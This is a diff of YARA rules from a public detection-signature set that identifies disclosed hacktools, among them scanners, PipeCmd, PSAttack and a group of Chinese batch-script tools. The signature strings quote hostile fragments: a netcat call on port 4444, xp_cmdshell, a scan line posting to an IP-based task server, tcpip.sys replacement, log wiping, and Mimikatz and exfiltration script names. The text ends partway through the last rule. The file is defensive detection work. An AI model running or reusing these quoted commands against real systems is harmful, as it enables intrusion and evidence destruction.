-		id = "3950b235-70bc-5afd-add5-38c50055b28b"
-		date = "2015-01-19"
+		id = "02075631-49cc-5b97-ad8e-92d734a26d34"
+		date = "2014-11-17"
 		modified = "2025-12-18"
-		reference = "not set"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2902-L2919"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1142-L1162"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "eb024dfb441471af7520215807c34d105efa5fd8"
-		logic_hash = "981514cf0887a1a7cb55fe9ed9dadd48adbf0f033e527b357e90e052a4c2d251"
-		score = 75
+		hash = "a61316578bcbde66f39d88e7fc113c134b5b966b"
+		logic_hash = "d3f5b2c601dfa1702bbd1f8bdc1f847dd34ba84a6c527a3e02cdb76075e4ad2c"
+		score = 60
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "snprintf(outfile, sizeof(outfile) - 1, \"scan.log\", argv[1], argv[2]);" fullword ascii
-		$s2 = "printf(\"Usage: %s <b-block> <port> [c-block]\\n\", argv[0]);" fullword ascii
-		$s3 = "printf(\"\\n# pscan completed in %u seconds. (found %d ips)\\n\", (time(0) - sca" ascii
-		$s19 = "connlist[i].addr.sin_family = AF_INET;" fullword ascii
-		$s20 = "snprintf(last, sizeof(last) - 1, \"%s.%d.* (total: %d) (%.1f%% done)\"," fullword ascii
+		$s0 = "for /f %%i in (ips.txt) do (start cmd.bat %%i)" fullword ascii
+		$s1 = "445\\nc.exe" fullword ascii
+		$s2 = "445\\s.exe" fullword ascii
+		$s3 = "cs.exe %1" fullword ascii
+		$s4 = "445\\cs.exe" fullword ascii
+		$s5 = "445\\ip.txt" fullword ascii
+		$s6 = "445\\cmd.bat" fullword ascii
+		$s9 = "@echo off" fullword ascii
 
 	condition:
-		2 of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Portscan : APT FILE
+rule SIGNATURE_BASE_Hacktools_CN_Wineggdrop
 {
 	meta:
-		description = "CN Port Scanner"
+		description = "Disclosed hacktool set - file s.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fb52a89a-2270-5170-9874-9278a0177454"
-		date = "2013-11-29"
+		id = "9b6244ee-5ace-5caa-bfa2-732bcfcfc998"
+		date = "2014-11-17"
 		modified = "2025-12-18"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2921-L2934"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1164-L1187"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e1b745bd321527cee3eb203847d00c9eda4a7b1e498cb8f0ad6b588f87221759"
-		score = 70
+		hash = "7665011742ce01f57e8dc0a85d35ec556035145d"
+		logic_hash = "6123a07038e30e11e37a70b912a1c854c13341e67eaf4ed14ca9954288a42d62"
+		score = 60
 		quality = 85
-		tags = "APT, FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		confidential = false
 
 	strings:
-		$s2 = "TCP 12.12.12.12"
+		$s0 = "Normal Scan: About To Scan %u IP For %u Ports Using %d Thread" fullword ascii
+		$s2 = "SYN Scan: About To Scan %u IP For %u Ports Using %d Thread" fullword ascii
+		$s6 = "Example: %s TCP 12.12.12.12 12.12.12.254 21 512 /Banner" fullword ascii
+		$s8 = "Something Wrong About The Ports" fullword ascii
+		$s9 = "Performing Time: %d/%d/%d %d:%d:%d --> " fullword ascii
+		$s10 = "Example: %s TCP 12.12.12.12/24 80 512 /T8 /Save" fullword ascii
+		$s12 = "%u Ports Scanned.Taking %d Threads " fullword ascii
+		$s13 = "%-16s %-5d -> \"%s\"" fullword ascii
+		$s14 = "SYN Scan Can Only Perform On WIN 2K Or Above" fullword ascii
+		$s17 = "SYN Scan: About To Scan %s:%d Using %d Thread" fullword ascii
+		$s18 = "Scan %s Complete In %d Hours %d Minutes %d Seconds. Found %u Open Ports" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and $s2
+		5 of them
 }
-rule SIGNATURE_BASE_WMI_Vbs : APT
+rule SIGNATURE_BASE_Hacktools_CN_Scan_BAT
 {
 	meta:
-		description = "WMI Tool - APT"
+		description = "Disclosed hacktool set - file scan.bat"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b367306a-38d8-5f4d-8f09-2bf025831f0a"
-		date = "2013-11-29"
+		id = "836e0618-93c7-5519-bbc4-705ff5c2e127"
+		date = "2014-11-17"
 		modified = "2025-12-18"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2936-L2949"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1189-L1207"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "94163981c1a80838d1bea1b21f713f1d8fbdac8704319d1a145f0b4f6d8ff3f6"
-		score = 70
+		hash = "6517d7c245f1300e42f7354b0fe5d9666e5ce52a"
+		logic_hash = "eed941d2ad5d33d7224504b08d2104d4043fab7a2ff027fc54cd1afd42e32549"
+		score = 60
 		quality = 85
-		tags = "APT"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		confidential = false
 
 	strings:
-		$s3 = "WScript.Echo \"   $$\\      $$\\ $$\\      $$\\ $$$$$$\\ $$$$$$$$\\ $$\\   $$\\ $$$$$$$$\\  $$$$$$"
+		$s0 = "for /f %%a in (host.txt) do (" ascii
+		$s1 = "for /f \"eol=S tokens=1 delims= \" %%i in (s2.txt) do echo %%i>>host.txt" fullword ascii
+		$s2 = "del host.txt /q" fullword ascii
+		$s3 = "for /f \"eol=- tokens=1 delims= \" %%i in (result.txt) do echo %%i>>s1.txt" fullword ascii
+		$s4 = "start Http.exe %%a %http%" fullword ascii
+		$s5 = "for /f \"eol=P tokens=1 delims= \" %%i in (s1.txt) do echo %%i>>s2.txt" fullword ascii
 
 	condition:
-		all of them
+		5 of them
 }
-rule SIGNATURE_BASE_CN_Toolset__Xscanlib_Xscanlib_Xscanlib
+rule SIGNATURE_BASE_Hacktools_CN_Panda_Burst
 {
 	meta:
-		description = "Detects a Chinese hacktool from a disclosed toolset - from files XScanLib.dll, XScanLib.dll, XScanLib.dll"
+		description = "Disclosed hacktool set - file Burst.rar"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c32415f4-044c-50ef-9c4c-b9327cbcef69"
-		date = "2015-03-30"
+		id = "e07c66d1-958e-5ad2-9d5b-380d48af8360"
+		date = "2014-11-17"
 		modified = "2025-12-18"
-		reference = "http://qiannao.com/ls/905300366/33834c0c/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2951-L2972"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1209-L1222"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f7f66f1f3ca05e60ac850fbb94c471f664d2dc8a60c09b18686c9f2937296697"
-		score = 70
+		hash = "ce8e3d95f89fb887d284015ff2953dbdb1f16776"
+		logic_hash = "c334019cab377f4d96f5daee6a2f1fa7e24ecc43b3aee1eb76537640fdfd8a97"
+		score = 60
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "af419603ac28257134e39683419966ab3d600ed2"
-		hash1 = "c5cb4f75cf241f5a9aea324783193433a42a13b0"
-		hash2 = "135f6a28e958c8f6a275d8677cfa7cb502c8a822"
 
 	strings:
-		$s1 = "Plug-in thread causes an exception, failed to alert user." fullword
-		$s2 = "PlugGetUdpPort" fullword
-		$s3 = "XScanLib.dll" fullword
-		$s4 = "PlugGetTcpPort" fullword
-		$s11 = "PlugGetVulnNum" fullword
+		$s0 = "@sql.exe -f ip.txt -m syn -t 3306 -c 5000 -u http://60.15.124.106:63389/tasksvr." ascii
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_CN_Toolset_Ntscan_Pipecmd
+rule SIGNATURE_BASE_Hacktools_CN_445_Cmd : FILE
 {
 	meta:
-		description = "Detects a Chinese hacktool from a disclosed toolset - file PipeCmd.exe"
+		description = "Disclosed hacktool set - file cmd.bat"
 		author = "Florian Roth (Nextron Systems)"
-		id = "056ee42d-23f4-5b03-b240-392bc92b90b0"
-		date = "2015-03-30"
+		id = "b9693f51-26ac-5bf1-8c4d-ca852a154636"
+		date = "2014-11-17"
 		modified = "2025-12-18"
-		reference = "http://qiannao.com/ls/905300366/33834c0c/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2974-L2998"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1224-L1239"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "a931d65de66e1468fe2362f7f2e0ee546f225c4e"
-		logic_hash = "2dab5a4de2abeff5659aa90fbc82bef359937ca9e45e8805b509baeb16943531"
-		score = 70
-		quality = 60
-		tags = ""
+		hash = "69b105a3aec3234819868c1a913772c40c6b727a"
+		logic_hash = "e0ab572fe9009ddc39f34302d8a16531c23f51ce4ea373d57a039f22ccc934c7"
+		score = 60
+		quality = 85
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "Please Use NTCmd.exe Run This Program." fullword ascii
-		$s3 = "PipeCmd.exe" fullword wide
-		$s4 = "\\\\.\\pipe\\%s%s%d" fullword ascii
-		$s5 = "%s\\pipe\\%s%s%d" fullword ascii
-		$s6 = "%s\\ADMIN$\\System32\\%s%s" fullword ascii
-		$s7 = "%s\\ADMIN$\\System32\\%s" fullword ascii
-		$s9 = "PipeCmdSrv.exe" fullword ascii
-		$s10 = "This is a service executable! Couldn't start directly." fullword ascii
-		$s13 = "\\\\.\\pipe\\PipeCmd_communicaton" fullword ascii
-		$s14 = "PIPECMDSRV" fullword wide
-		$s15 = "PipeCmd Service" fullword ascii
+		$bat = "@echo off" fullword ascii
+		$s0 = "cs.exe %1" fullword ascii
+		$s2 = "nc %1 4444" fullword ascii
 
 	condition:
-		4 of them
+		uint32( 0 ) == 0x68636540 and $bat at 0 and all of ( $s* )
 }
-rule SIGNATURE_BASE_CN_Toolset_Lscanportss_2
+rule SIGNATURE_BASE_Hacktools_CN_GOGOGO_Bat
 {
 	meta:
-		description = "Detects a Chinese hacktool from a disclosed toolset - file LScanPortss.exe"
+		description = "Disclosed hacktool set - file GOGOGO.bat"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0a796585-5fc8-5b55-acfc-3fe87308b681"
-		date = "2015-03-30"
+		id = "b52cc150-81d4-5895-8f83-ee2006f75617"
+		date = "2014-11-17"
 		modified = "2025-12-18"
-		reference = "http://qiannao.com/ls/905300366/33834c0c/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3000-L3020"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1241-L1266"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "4631ec57756466072d83d49fbc14105e230631a0"
-		logic_hash = "aeecdbef3fe6d66a209df10b44046783e53ef12f67c6877309cb219db4354733"
-		score = 70
+		hash = "4bd4f5b070acf7fe70460d7eefb3623366074bbd"
+		logic_hash = "0209ffba87ff07379c768c1c00496a37f0f9bc6b786a31afdafe55d65a9f39ab"
+		score = 60
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "LScanPort.EXE" fullword wide
-		$s3 = "www.honker8.com" fullword wide
-		$s4 = "DefaultPort.lst" fullword ascii
-		$s5 = "Scan over.Used %dms!" fullword ascii
-		$s6 = "www.hf110.com" fullword wide
-		$s15 = "LScanPort Microsoft " fullword wide
-		$s18 = "L-ScanPort2.0 CooFly" fullword wide
+		$s0 = "for /f \"delims=\" %%x in (endend.txt) do call :lisoob %%x" fullword ascii
+		$s1 = "http://www.tzddos.com/ -------------------------------------------->byebye.txt" fullword ascii
+		$s2 = "ren %systemroot%\\system32\\drivers\\tcpip.sys tcpip.sys.bak" fullword ascii
+		$s4 = "IF /I \"%wangle%\"==\"\" ( goto start ) else ( goto erromm )" fullword ascii
+		$s5 = "copy *.tzddos scan.bat&del *.tzddos" fullword ascii
+		$s6 = "del /f tcpip.sys" fullword ascii
+		$s9 = "if /i \"%CB%\"==\"www.tzddos.com\" ( goto mmbat ) else ( goto wangle )" fullword ascii
+		$s10 = "call scan.bat" fullword ascii
+		$s12 = "IF /I \"%erromm%\"==\"\" ( goto start ) else ( goto zuihoujh )" fullword ascii
+		$s13 = "IF /I \"%zuihoujh%\"==\"\" ( goto start ) else ( goto laji )" fullword ascii
+		$s18 = "sc config LmHosts start= auto" fullword ascii
+		$s19 = "copy tcpip.sys %systemroot%\\system32\\drivers\\tcpip.sys > nul" fullword ascii
+		$s20 = "ren %systemroot%\\system32\\dllcache\\tcpip.sys tcpip.sys.bak" fullword ascii
 
 	condition:
-		4 of them
+		3 of them
 }
-rule SIGNATURE_BASE_CN_Toolset_Sig_1433_135_Sqlr
+rule SIGNATURE_BASE_Hacktools_CN_Burst_Pass
 {
 	meta:
-		description = "Detects a Chinese hacktool from a disclosed toolset - file sqlr.exe"
+		description = "Disclosed hacktool set - file pass.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "74038975-ef06-53d6-bdcc-02706408b596"
-		date = "2015-03-30"
+		id = "d8f6784f-80c8-51e2-9d86-40022cd8705d"
+		date = "2014-11-17"
 		modified = "2025-12-18"
-		reference = "http://qiannao.com/ls/905300366/33834c0c/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3022-L3039"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1268-L1291"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "8542c7fb8291b02db54d2dc58cd608e612bfdc57"
-		logic_hash = "14c9d104cfb71a2d3545bfb6274e3a282d4597f38057187d76adaf26fe2718fa"
-		score = 70
-		quality = 85
+		hash = "55a05cf93dbd274355d798534be471dff26803f9"
+		logic_hash = "3a30cc602a66bd87304756311d56e7c698c1edb0b4b209198c589c4792776992"
+		score = 60
+		quality = 60
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Connect to %s MSSQL server success. Type Command at Prompt." fullword ascii
-		$s11 = ";DATABASE=master" fullword ascii
-		$s12 = "xp_cmdshell '" fullword ascii
-		$s14 = "SELECT * FROM OPENROWSET('SQLOLEDB','Trusted_Connection=Yes;Data Source=myserver" ascii
+		$s0 = "123456.com" fullword ascii
+		$s1 = "123123.com" fullword ascii
+		$s2 = "360.com" fullword ascii
+		$s3 = "123.com" fullword ascii
+		$s4 = "juso.com" fullword ascii
+		$s5 = "sina.com" fullword ascii
+		$s7 = "changeme" fullword ascii
+		$s8 = "master" fullword ascii
+		$s9 = "google.com" fullword ascii
+		$s10 = "chinanet" fullword ascii
+		$s12 = "lionking" fullword ascii
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Vssown_VBS
+rule SIGNATURE_BASE_Hacktools_CN_Johor_Posts_Killer
 {
 	meta:
-		description = "Detects VSSown.vbs script - used to export shadow copy elements like NTDS to take away and crack elsewhere"
+		description = "Disclosed hacktool set - file JoHor_Posts_Killer.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ffbb5faf-3522-50dc-a568-503074ac0636"
-		date = "2015-10-01"
+		id = "68bba78e-f3a0-5eaa-9c63-e5f23a76b328"
+		date = "2014-11-17"
 		modified = "2025-12-18"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3056-L3073"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1293-L1314"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f49e9d7a07d591330e16fc539bd98d019b47dd8579d0f1ad92fa987790e64189"
-		score = 75
+		hash = "d157f9a76f9d72dba020887d7b861a05f2e56b6a"
+		logic_hash = "2fc63cd42619a2b92ab8670b14ab4c01eb3b194cd337d329ba224b7088d26318"
+		score = 60
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Select * from Win32_Service Where Name ='VSS'" ascii
-		$s1 = "Select * From Win32_ShadowCopy" ascii
-		$s2 = "cmd /C mklink /D " ascii
-		$s3 = "ClientAccessible" ascii
-		$s4 = "WScript.Shell" ascii
-		$s5 = "Win32_Process" ascii
+		$s0 = "Multithreading Posts_Send Killer" fullword ascii
+		$s3 = "GET [Access Point] HTTP/1.1" fullword ascii
+		$s6 = "The program's need files was not exist!" fullword ascii
+		$s7 = "JoHor_Posts_Killer" fullword wide
+		$s8 = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" fullword ascii
+		$s10 = "  ( /s ) :" fullword ascii
+		$s11 = "forms.vbp" fullword ascii
+		$s12 = "forms.vcp" fullword ascii
+		$s13 = "Software\\FlySky\\E\\Install" fullword ascii
 
 	condition:
-		all of them
+		5 of them
 }
-rule SIGNATURE_BASE_Netview_Hacktool : FILE
+rule SIGNATURE_BASE_Hacktools_CN_Panda_Tesksd
 {
 	meta:
-		description = "Network domain enumeration tool - often used by attackers - file Nv.exe"
+		description = "Disclosed hacktool set - file tesksd.jpg"
 		author = "Florian Roth (Nextron Systems)"
-		id = "087e2fd7-726e-5c6b-ba99-e20dd3337d6a"
-		date = "2016-03-07"
+		id = "399ff307-c2e8-57bb-b792-a2c599e8686e"
+		date = "2014-11-17"
 		modified = "2025-12-18"
-		reference = "https://github.com/mubix/netview"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3075-L3098"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1316-L1331"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "52cec98839c3b7d9608c865cfebc904b4feae0bada058c2e8cdbd561cfa1420a"
-		logic_hash = "dc27d2358937d736823891c9d5c3f41f83a6f4e72d35fae0983435effda2141a"
+		hash = "922147b3e1e6cf1f5dd5f64a4e34d28bdc9128cb"
+		logic_hash = "dc81acef0ad3e6307f68ee755e5b27f2dcf1e2822e560a72dc5ae572703f4459"
 		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "[+] %ws - Target user found - %s\\%s" fullword wide
-		$s2 = "[*] -g used without group specified - using \"Domain Admins\"" fullword ascii
-		$s3 = "[*] -i used without interval specified - ignoring" fullword ascii
-		$s4 = "[+] %ws - Session - %s from %s - Active: %d - Idle: %d" fullword wide
-		$s5 = "[+] %ws - Backup Domain Controller" fullword wide
-		$s6 = "[-] %ls - Share - Error: %ld" fullword wide
-		$s7 = "[-] %ls - Session - Error: %ld" fullword wide
-		$s8 = "[+] %s - OS Version - %d.%d" fullword ascii
-		$s9 = "Enumerating Logged-on Users" fullword ascii
-		$s10 = ": Specifies a domain to pull a list of hosts from" fullword ascii
+		$s0 = "name=\"Microsoft.Windows.Common-Controls\" " fullword ascii
+		$s1 = "ExeMiniDownload.exe" fullword wide
+		$s16 = "POST %Hs" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 500KB and 2 of them ) or 3 of them
+		all of them
 }
-rule SIGNATURE_BASE_Netview_Hacktool_Output
+rule SIGNATURE_BASE_Hacktools_CN_Http : FILE
 {
 	meta:
-		description = "Network domain enumeration tool output - often used by attackers - file filename.txt"
+		description = "Disclosed hacktool set - file Http.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "259db870-6293-5a55-b56a-f981c060c18f"
-		date = "2016-03-07"
+		id = "bbff6ff6-8cef-5a83-afd3-34f306e8e715"
+		date = "2014-11-17"
 		modified = "2025-12-18"
-		reference = "https://github.com/mubix/netview"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3100-L3115"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1333-L1349"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "38a51e583b1485bdb29400cb9d0a73ec4d5387675779f949572d2b4d74da4230"
+		hash = "788bf0fdb2f15e0c628da7056b4e7b1a66340338"
+		logic_hash = "690b41bdf856e0d4d90b4a42524134302e9649018fdd495c359582aa6121a017"
 		score = 60
-		quality = 85
-		tags = ""
+		quality = 83
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "[*] Using interval:" fullword
-		$s2 = "[*] Using jitter:" fullword
-		$s3 = "[+] Number of hosts:" fullword
+		$s0 = "RPCRT4.DLL" fullword ascii
+		$s1 = "WNetAddConnection2A" fullword ascii
+		$s2 = "NdrPointerBufferSize" fullword ascii
+		$s3 = "_controlfp" fullword ascii
 
 	condition:
-		2 of them
+		all of them and filesize < 10KB
 }
-rule SIGNATURE_BASE_Psattack_EXE : FILE
+rule SIGNATURE_BASE_Hacktools_CN_Burst_Start
 {
 	meta:
-		description = "PSAttack - Powershell attack tool - file PSAttack.exe"
+		description = "Disclosed hacktool set - file Start.bat - DoS tool"
 		author = "Florian Roth (Nextron Systems)"
-		id = "87f7956a-f607-5e14-a940-5080499cf682"
-		date = "2016-03-09"
-		modified = "2023-01-06"
-		reference = "https://github.com/gdssecurity/PSAttack/releases/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3126-L3146"
+		id = "1291fbc5-fbb3-5425-bb9a-e45f4d7cf562"
+		date = "2014-11-17"
+		modified = "2023-01-27"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1351-L1373"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "ad05d75640c850ee7eeee26422ba4f157be10a4e2d6dc6eaa19497d64cf23715"
-		logic_hash = "b73566eb6370fbe68f0477d1179e5d6c19fb9be2c29f63d560c42adcdf19fe58"
-		score = 100
-		quality = 60
-		tags = "FILE"
+		hash = "75d194d53ccc37a68286d246f2a84af6b070e30c"
+		logic_hash = "b435957150da7b790809d2cf90a01c967127c183ddcbf333beda1a7c599b69a5"
+		score = 60
+		quality = 85
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "\\Release\\PSAttack.pdb"
-		$s1 = "set-executionpolicy bypass -Scope process -Force" fullword wide
-		$s2 = "PSAttack.Modules." ascii
-		$s3 = "PSAttack.PSAttackProcessing" fullword ascii
-		$s4 = "PSAttack.Modules.key.txt" fullword wide
+		$s0 = "for /f \"eol= tokens=1,2 delims= \" %%i in (ip.txt) do (" ascii
+		$s1 = "Blast.bat /r 600" fullword ascii
+		$s2 = "Blast.bat /l Blast.bat" fullword ascii
+		$s3 = "Blast.bat /c 600" fullword ascii
+		$s4 = "start Clear.bat" fullword ascii
+		$s5 = "del Result.txt" fullword ascii
+		$s6 = "s syn %%i %%j 3306 /save" fullword ascii
+		$s7 = "start Thecard.bat" fullword ascii
+		$s10 = "setlocal enabledelayedexpansion" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and ( $x1 or 2 of ( $s* ) ) ) or 3 of them
+		5 of them
 }
-rule SIGNATURE_BASE_Powershell_Attack_Scripts
+rule SIGNATURE_BASE_Hacktools_CN_Panda_Tasksvr
 {
 	meta:
-		description = "Powershell Attack Scripts"
+		description = "Disclosed hacktool set - file tasksvr.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e8c4a672-229b-56c8-811b-071ae9ff341e"
-		date = "2016-03-09"
+		id = "5c85b382-551a-5e9e-9af8-d106cbe26f74"
+		date = "2014-11-17"
 		modified = "2025-12-18"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3148-L3163"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1375-L1390"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "42a52de089ee00e229499fea23b8acd0b7c881a9c578671aea180c0c018a54e0"
-		score = 70
+		hash = "a73fc74086c8bb583b1e3dcfd326e7a383007dc0"
+		logic_hash = "183708e525ec6676662b59a2a3c79f5113a80f2d5b3bd4713c74a536fe303b2d"
+		score = 60
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "PowershellMafia\\Invoke-Shellcode.ps1" ascii
-		$s2 = "Nishang\\Do-Exfiltration.ps1" ascii
-		$s3 = "PowershellMafia\\Invoke-Mimikatz.ps1" ascii
-		$s4 = "Inveigh\\Inveigh.ps1" ascii
+		$s2 = "Consys21.dll" fullword ascii
+		$s4 = "360EntCall.exe" fullword wide
+		$s15 = "Beijing1" fullword ascii
 
 	condition:
-		1 of them
+		all of them
 }
-rule SIGNATURE_BASE_Psattack_ZIP : FILE
+rule SIGNATURE_BASE_Hacktools_CN_Burst_Clear
 {
 	meta:
-		description = "PSAttack - Powershell attack tool - file PSAttack.zip"
+		description = "Disclosed hacktool set - file Clear.bat"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4e064eb4-0b87-590c-9ee4-6764b982c006"
-		date = "2016-03-09"
+		id = "21f33a36-779e-5eac-819c-ef79f291b43c"
+		date = "2014-11-17"
 		modified = "2025-12-18"
-		reference = "https://github.com/gdssecurity/PSAttack/releases/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3165-L3179"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1392-L1413"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "3864f0d44f90404be0c571ceb6f95bbea6c527bbfb2ec4a2b4f7d92e982e15a2"
-		logic_hash = "4c869e8663b8c87780d4be622f86b3887511e1ac3cfc67767f1c986af7d43767"
-		score = 100
+		hash = "148c574a4e6e661aeadaf3a4c9eafa92a00b68e4"
+		logic_hash = "d10ed2c6ea3f1a8b289529cc90f50f84288003576aced903f48db3c2abc4722d"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "PSAttack.exe" fullword ascii
+		$s0 = "del /f /s /q %systemdrive%\\*.log    " fullword ascii
+		$s1 = "del /f /s /q %windir%\\*.bak    " fullword ascii
